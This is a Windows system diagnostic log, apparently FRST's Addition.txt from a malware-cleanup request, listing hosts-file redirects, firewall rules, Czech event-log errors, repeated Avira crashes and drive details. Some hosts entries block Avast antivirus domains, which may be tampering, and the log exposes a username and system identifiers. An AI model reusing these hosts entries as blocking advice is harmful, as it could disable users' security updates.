127.0.0.1 csdimonetize.com
127.0.0.1 dl.azalee.site
127.0.0.1 titiaredh.com
127.0.0.1 wepcdisplaysystem.com
127.0.0.1 wepcanalyticsystem.com
127.0.0.1 healthydownload.com
127.0.0.1 leading2download.com
127.0.0.1 dwl0.wizzlabs.com
127.0.0.1 dwl1.wizzlabs.com
127.0.0.1 installpixel.com
127.0.0.1 burningcube.ru
127.0.0.1 mess1.wizzmonetize.com
127.0.0.1 dl.azalee.site
127.0.0.1 dl.smashdl.com
127.0.0.1 downloadmyhost.com
127.0.0.1 lapapahoster.com
127.0.0.1	gf.tools.avast.com
127.0.0.1	pair.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com

There are 359 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2078289314-747550931-3204368465-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\89vision\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{ae826cc4-40d3-403d-98ec-b0bf4867eaed}.jpg
DNS Servers: 77.48.254.254 - 77.48.100.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{068BD819-F69A-4149-BCE5-0E42794BF620}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{F03CA453-7839-4608-A89F-2BC04DAED289}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{603BC0EA-8940-49ED-AB3E-9B65DF6785F9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{FE13D14E-B891-49F9-BEA6-D7D74A3E0BA4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{ECF9A893-45F8-4D21-A374-DCC98B51B147}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8B18A353-9854-4A8B-8461-80DAB2CD8B32}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{E8E26757-902C-4EA9-9522-CF826694EDC0}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [TCP Query User{E694CB83-4E26-4889-9B4D-40F3569D5745}G:\adobe_cloud\adobe premiere pro cc 2017\adobe premiere pro.exe] => (Allow) G:\adobe_cloud\adobe premiere pro cc 2017\adobe premiere pro.exe
FirewallRules: [UDP Query User{D1C6BD9C-E8DD-4048-9381-AE784338C7FE}G:\adobe_cloud\adobe premiere pro cc 2017\adobe premiere pro.exe] => (Allow) G:\adobe_cloud\adobe premiere pro cc 2017\adobe premiere pro.exe
FirewallRules: [{E5F543D6-1110-4649-AEA4-5D61ACA413E0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{81D99105-64EA-40CB-89A7-171694DF4C5A}C:\users\89vision\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\89vision\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{410CAF23-880A-4951-96AB-1E19E5478694}C:\users\89vision\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\89vision\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{7EC48D0F-C934-48BA-8C6D-46C3D7FEA4B9}] => (Allow) H:\Steam\Steam.exe
FirewallRules: [{5437FBAB-10A3-4033-8F43-E4C2FB9C6D3C}] => (Allow) H:\Steam\Steam.exe
FirewallRules: [{AC66F872-7401-413C-A9AF-8D69181193FE}] => (Allow) H:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{21B0748F-8B19-4AF9-88DA-6ABFEE5460AC}] => (Allow) H:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{867C8ED5-68C6-4B77-AC4E-55C8DAFA6591}] => (Allow) H:\OriginGames\Battlefield 1\bf1Trial.exe
FirewallRules: [{06C21BD4-6792-4209-BF64-A52A687EB0DF}] => (Allow) H:\OriginGames\Battlefield 1\bf1Trial.exe
FirewallRules: [{B21EE4A1-08CE-4CBF-914E-A3FB5BB690CA}] => (Allow) H:\OriginGames\Battlefield 1\bf1.exe
FirewallRules: [{667F751A-1FBD-453A-86D0-A9EE3C81DF62}] => (Allow) H:\OriginGames\Battlefield 1\bf1.exe
FirewallRules: [{E087EF2D-2679-4428-BF96-B02EE2CFFD8A}] => (Allow) C:\Windows\system32\rundll32.exe

==================== Restore Points =========================

03-07-2017 17:23:02 Naplánovaný kontrolní bod
06-07-2017 00:44:44 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
08-07-2017 18:01:30 Installed Apple Application Support (32-bit)
11-07-2017 20:16:48 Windows Update
18-07-2017 19:51:13 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501

==================== Faulty Device Manager Devices =============

Name: Síťový adaptér
Description: Síťový adaptér
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (07/19/2017 07:50:09 PM) (Source: Avira Service Host) (EventID: 0) (User: )
Description: An error occurred during the installation. Start the repair.

Error: (07/19/2017 07:49:59 PM) (Source: Avira Service Host) (EventID: 0) (User: )
Description: An error occurred during the installation. Start the repair.

Error: (07/19/2017 07:49:44 PM) (Source: Avira Service Host) (EventID: 0) (User: )
Description: An error occurred during the installation. Start the repair.

Error: (07/19/2017 12:45:15 AM) (Source: Avira Service Host) (EventID: 0) (User: )
Description: An error occurred during the installation. Start the repair.

Error: (07/19/2017 12:45:05 AM) (Source: Avira Service Host) (EventID: 0) (User: )
Description: An error occurred during the installation. Start the repair.

Error: (07/19/2017 12:44:51 AM) (Source: Avira Service Host) (EventID: 0) (User: )
Description: An error occurred during the installation. Start the repair.

Error: (07/19/2017 12:02:39 AM) (Source: Avira Service Host) (EventID: 0) (User: )
Description: An error occurred during the installation. Start the repair.

Error: (07/19/2017 12:02:28 AM) (Source: Avira Service Host) (EventID: 0) (User: )
Description: An error occurred during the installation. Start the repair.

Error: (07/19/2017 12:02:18 AM) (Source: Avira Service Host) (EventID: 0) (User: )
Description: An error occurred during the installation. Start the repair.

Error: (07/18/2017 11:46:50 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-DEFCV82)
Description: Aplikaci Microsoft.Windows.SecHealthUI_cw5n1h2txyewy!SecHealthUI se nepovedlo aktivovat, protože došlo k chybě: -2144927149. Další informace najdete v protokolu Microsoft-Windows-TWinUI/Operational.


System errors:
=============
Error: (07/19/2017 07:50:09 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Avira Service Host byla neočekávaně ukončena. Tento stav nastal již 3krát.

Error: (07/19/2017 07:49:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Avira Service Host byla nečekaně ukončena. Stalo se to 2 krát. Následující opravná akce bude spuštěna za 10000 milisekund: Restartovat službu.

Error: (07/19/2017 07:49:49 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Avira Service Host byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 10000 milisekund: Restartovat službu.

Error: (07/19/2017 07:49:46 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 a APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 uživateli NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (07/19/2017 07:49:46 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 a APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 uživateli NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (07/19/2017 07:49:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba CldFlt neuspěla při spuštění v důsledku následující chyby: 
Požadavek není podporován.

Error: (07/19/2017 07:49:43 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Předchozí vypnutí systému (1:02:50, ‎19.‎07.‎2017) bylo neočekávané.

Error: (07/19/2017 07:49:28 PM) (Source: Microsoft-Windows-Kernel-Boot) (EventID: 29) (User: NT AUTHORITY)
Description: 32212256844708074431494528

Error: (07/19/2017 12:45:15 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Avira Service Host byla neočekávaně ukončena. Tento stav nastal již 3krát.

Error: (07/19/2017 12:45:05 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Avira Service Host byla nečekaně ukončena. Stalo se to 2 krát. Následující opravná akce bude spuštěna za 10000 milisekund: Restartovat službu.


CodeIntegrity:
===================================
  Date: 2017-07-18 19:41:48.389
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-5960X CPU @ 3.00GHz
Percentage of memory in use: 9%
Total physical RAM: 49061.54 MB
Available physical RAM: 44295.75 MB
Total Virtual: 56229.54 MB
Available Virtual: 50980.41 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:232.88 GB) (Free:171.36 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (SSDR) (Fixed) (Total:465.76 GB) (Free:125.09 GB) NTFS
Drive e: (premiere_dump) (Fixed) (Total:931.51 GB) (Free:173.48 GB) NTFS
Drive f: (Premiere_cache) (Fixed) (Total:931.51 GB) (Free:25.48 GB) NTFS
Drive g: (SSDII) (Fixed) (Total:111.79 GB) (Free:90.99 GB) NTFS
Drive h: (premiere_projects) (Fixed) (Total:1863.01 GB) (Free:1209.62 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: F854CA0F)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 00000001)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 6BA56BA5)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 3 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: DBDE8F68)
Partition 1: (Active) - (Size=232.9 GB) - (Type=07 NTFS)

========================================================
Disk: 4 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: B3241C0E)
Partition 1: (Not Active) - (Size=111.8 GB) - (Type=07 NTFS)

========================================================
Disk: 5 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 0E4302C9)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================